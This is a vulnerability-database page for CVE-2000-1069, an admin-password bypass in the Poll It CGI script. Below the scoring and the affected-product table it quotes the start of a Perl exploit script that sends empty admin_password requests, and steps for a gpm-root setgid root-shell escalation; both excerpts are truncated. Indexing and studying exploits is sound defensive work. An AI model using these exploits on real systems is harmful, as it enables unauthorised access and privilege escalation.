CVE-2000-1069
published 2000-12-11CVE-2000-1069: pollit.cgi in Poll It 2.01 and earlier allows remote attackers to access administrative functions without knowing the real password by specifying the same…
PriorityP431medium6.4CVSS 2.0
AVNACLAuNCPIPAN
EXPLOIT
EPSS
2.27%
80.9th percentile
pollit.cgi in Poll It 2.01 and earlier allows remote attackers to access administrative functions without knowing the real password by specifying the same value to the entered_password and admin_password parameters.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| cgi-world | poll_it | — | — |
| cgi-world | poll_it | — | — |
| cgi-world | poll_it_pro | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Poll It CGI 2.0 - Multiple Vulnerabilities
exploitdb·2000-11-15
CVE-2000-1069 Poll It CGI 2.0 - Multiple Vulnerabilities
Poll It CGI 2.0 - Multiple Vulnerabilities
---
#!/usr/bin/perl
######################################
# #
# #
# Poll It CGI v2.0 exploit #
# keelis/havoc korp 2000 #
# #
# shouts to modjo, p, zen, kd, #
# ab, all the script kiddies. #
# #
# #
# keelis(at)hushmail(dot)com #
# #
# #
######################################
use Socket;
($host, $cgi_loc) = @ARGV[0,1];
$ip=inet_aton($host);
print("\n\t+--- Poll It CGI v2.0 exploit ---+");
print("\n\t+--- keelis/havoc korp 2000 ---+\n\n\n");
usage() if (!defined($host) || !defined($cgi_loc));
while(true)
{
print "[poll\@$host] ";
$stdin = \*STDIN;
$cmdin = ;
chomp($cmdin);
($cmd, $param) = split(/ /, $cmdin, 2);
if ($cmd eq "d")
{
$request = "?load=admin&admin_password=&action=delete_poll";
$success_msg = "current poll has been deleted
Exploit-DB
gpm 1.18.1/1.19 / Debian 2.x / RedHat 6.x / S.u.S.E 5.3/6.x - gpm Setgid
exploitdb·2000-03-22
CVE-2000-0229 gpm 1.18.1/1.19 / Debian 2.x / RedHat 6.x / S.u.S.E 5.3/6.x - gpm Setgid
gpm 1.18.1/1.19 / Debian 2.x / RedHat 6.x / S.u.S.E 5.3/6.x - gpm Setgid
---
source: https://www.securityfocus.com/bid/1069/info
A vulnerability exists in the gpm-root program, part of the gpm package. This package is used to enable mice on the consoles of many popular Linux distributions. The problem is a design error, caused when a programmer chose to attempt to revert to the running users groups, after having called setuid to the users id already. The setgid call fails, and the process maintains the groups the gpm-root program is running as. This is usually the 'root' group.
This vulnerability requires the user have console access.
cp /bin/sh /tmp
create a .gpm-root file in ~ with the following:
button 1 {
name "create a setgid shell"
"setgid shell" f.bgcmd "chgrp root /tmp/sh; chm
No writeups or analysis indexed.
2000-12-11
Published